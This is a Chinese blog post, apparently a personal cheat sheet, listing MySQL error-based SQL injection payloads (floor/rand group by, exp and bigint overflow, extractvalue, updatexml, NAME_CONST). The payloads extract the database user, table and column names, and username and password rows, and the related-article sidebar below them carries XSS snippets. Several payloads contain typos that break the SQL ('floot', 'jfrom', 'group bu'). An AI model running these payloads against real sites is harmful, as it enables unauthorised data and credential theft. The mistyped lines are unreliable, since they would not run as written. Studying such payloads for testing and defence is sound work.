sql盲注----构造payload 让信息通过错误提示回显出来

最新推荐文章于 2024-03-06 10:00:59 发布
最新推荐文章于 2024-03-06 10:00:59 发布
阅读量934 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42350229/article/details/103997097
版权
基于报错的sql盲注----构造payload 让信息通过错误提示回显出来
select 1, count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a,floot(rand(0)*2))a jfrom information_schema.columns group by a;

//explain:此处有三个点,一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的重复,三是 group by 进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释为 mysql 的 bug 的问题。但是此处需要将 rand(0),rand()需要多试几次

简化形式如下:

select count(*) from infromation_schema.tables group by concat(version(), floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式

select count(*) from (select 1 union select null union select !1) group bu concat(version(),floor(0)*2)

如果rand被禁用了可以使用用户变量来报错

select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

select exp(~(select * from (select user())a))
//double数值类型超出范围,exp()为以e为底的对数函数;版本在5.5.5及其以上

得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

检索数据:

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

参考文章:https://www.cnblogs.com/lcamry/articles/5509124.html

select !(select * from (select user())x) - ~0

//bigint 超出范围:~0是对0的逐位取反 版本5.5.5以上

利用最大整数无法处理引发报错

首先,我们来获取表名:

!(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0

取得列名:

select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;

检索数据:

!(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;

参考文章: https://www.cnblogs.com/lcamry/articles/5509112.html

extractvalue(1,concat(0x7e,(select @@version),0x7e))

//mysql对xml数据进行查询和修改的xpath函数,xpath语法错误

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

//mysql对xml数据进行查询和修改的xpath函数,xpath语法错误

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

//mysql重复特性,此处重复了version,所以报错

个人自建blog:
http://pigdaqiang.top
http://texttxet.github.io
简书blog:
https://www.jianshu.com/p/a3f16067044e

Pito
关注
专栏目录
【网络安全 | 2万字总结】SQL盲注?这一篇就够了。
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
确认并利用 SQL 盲注漏洞
2301_77324496的博客
11-04 142
在服务器端,sql 注入和 sql 盲注是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第一个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 注入表单(SQL Injection)一模一样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后一个%匹配的是空字符,所以用户名是 dvwa@
xss payload构造方法
weixin_48734687的博客
10-01 2408
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
手动构造格式化字符串payload
weixin_66751120的博客
02-19 888
像上次总结的格式化字符串漏洞的题都是能够溢出大量字节,因此能够使用pwntools的工具来自动生成payload但是如果题目给到了字节限制,使payload链所占字节非常有限,不足以装下自动生成的,那么就需要我们去手动构造payload,在正式了解手动构造之前可以通过上面链接回顾一下格式化字符串漏洞的知识,并且需要特别注意三个格式化字符。这是手动构造的关键。这里要注意一个h是以两个字节的方式写入,一般使用这个可以更省字节。
SSTI的payload构造思路
shawdow_bug的博客
04-24 2085
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
攻下windows7第三天——构造payload
ploto_cs的博客
10-03 2712
一.实验背景 随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的! 二.实验环境 攻击机kali :192.168.126.129 靶机 win7:192.168.126.134 三.操作步骤 1.使用.exe作为web shell(关闭防火墙) (1)生成一个payload
【XSS】payload 常用构造和变形方法
最新发布
吉吉的博客
03-06 2645
XSS 相关 payload 构造和变形的常用方法。
SQL_Injection_PayloadSQL注入有效负载列表
01-28
3. **盲注与时间基注入**:在某些情况下,攻击者可能无法直接看到注入结果,但可以通过观察查询执行时间或返回错误信息来推断数据。 4. **联合查询注入**:攻击者可以利用这种技术将两个或更多查询组合在一起,从而...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
3. **基于报错的SQL盲注**:通过让数据库产生错误并观察错误信息来获取数据,例如使用`floor`、`updatexml`或`extractvalue`函数。攻击者可以构造特定的SQL语句,使数据库在处理时出错,从而揭示部分信息。 **示例...
SQL注入--报错和盲注
qq_57307348的博客
02-10 1928
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔型盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
生成payload
分享学习网络的点点滴滴
12-30 617
【代码】生成payload
盲注payload
MingShenfree的博客
10-27 1470
时间盲注 ​ 时间盲注也叫延时注入,一般用到函数sleep(),BENCHMARK()还会用到笛卡尔积(尽量不要使用,内容太多睡很慢很卡) ​ 一般时间盲注我们还需要使用条件判断符 ​ if(expre1,expre2,expre3),当expre1为true时,返回expre2,false时,返回expre3 ​ 盲注的同时也配合这mysql提供的分割函数 ​ substr(),substring(),left() ​ ...
sqli-labs Less5~6 布尔盲注(有报错回显)
双子叶mm的博客
10-22 245
双查询注入原理 这里参考了这篇文章: https://blog.csdn.net/Leep0rt/article/details/78556440 需要理解四个函数/语句: 1. rand() //随机函数 2. floor() //取整函数 3. count() //汇总函数 4. group by clause //分组语句 Rand()函数作用如下: 返回[0,1)之间的随机数,用法就是SELECT rand(); Floor()函数作用如下: 向下取整,用法即SELECT floor(11.
(16)【SQL盲注】基础函数、报错回显、延时判断、逻辑判断盲注
02-25 2058
适合新手看的盲注
WBE漏洞-SQL注入之报错盲注
硫酸超的博客
07-30 498
WBE漏洞-SQL注入之查询方式及报错盲注前言涉及知识点SQL注入报错盲注基于布尔的SQL盲注-逻辑判断基于时间的SQL盲注-延时判断基于报错的SQL盲注-报错回显floorupdatexmlextractvalue 前言 当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好地选择对应的注入语句。 涉及知识点 select 查询数据 在网站应用中
WEB漏洞-SQL注入之报错盲注
ran的博客
01-16 676
内容包括导图、引论,SQL盲注的方法:报错盲注(insert报错盲注、update报错盲注、delete报错盲注)、时间盲注、布尔盲注,从基础内容开始,与实例结合,由浅到深的介绍了各种盲注方法的原理以及盲注过程,用到的实例包括pikachu、SQLi-LABS等,同时介绍了常用的SQL语句的用法,对盲注过程中用到的各种函数也进行了简单明了的介绍。
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2092
return to dl-resolve payload构造原理
WEB漏洞-SQL注入之查询方式及报错盲注(学习笔记)
qq_19375535的博客
07-01 272
sql学习笔记
RFC 3640:MPEG-4 elementary stream RTP payload format标准
MPEG-4标准提供了丰富的工具,用于压缩多媒体数据,包括音频和视觉信息,将其打包成基本流。RFC3640的目标是解决在实时网络环境中如何有效地将这些基本流通过RTP进行传输的问题。 该文档详细描述了RTP封装MPEG-4...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值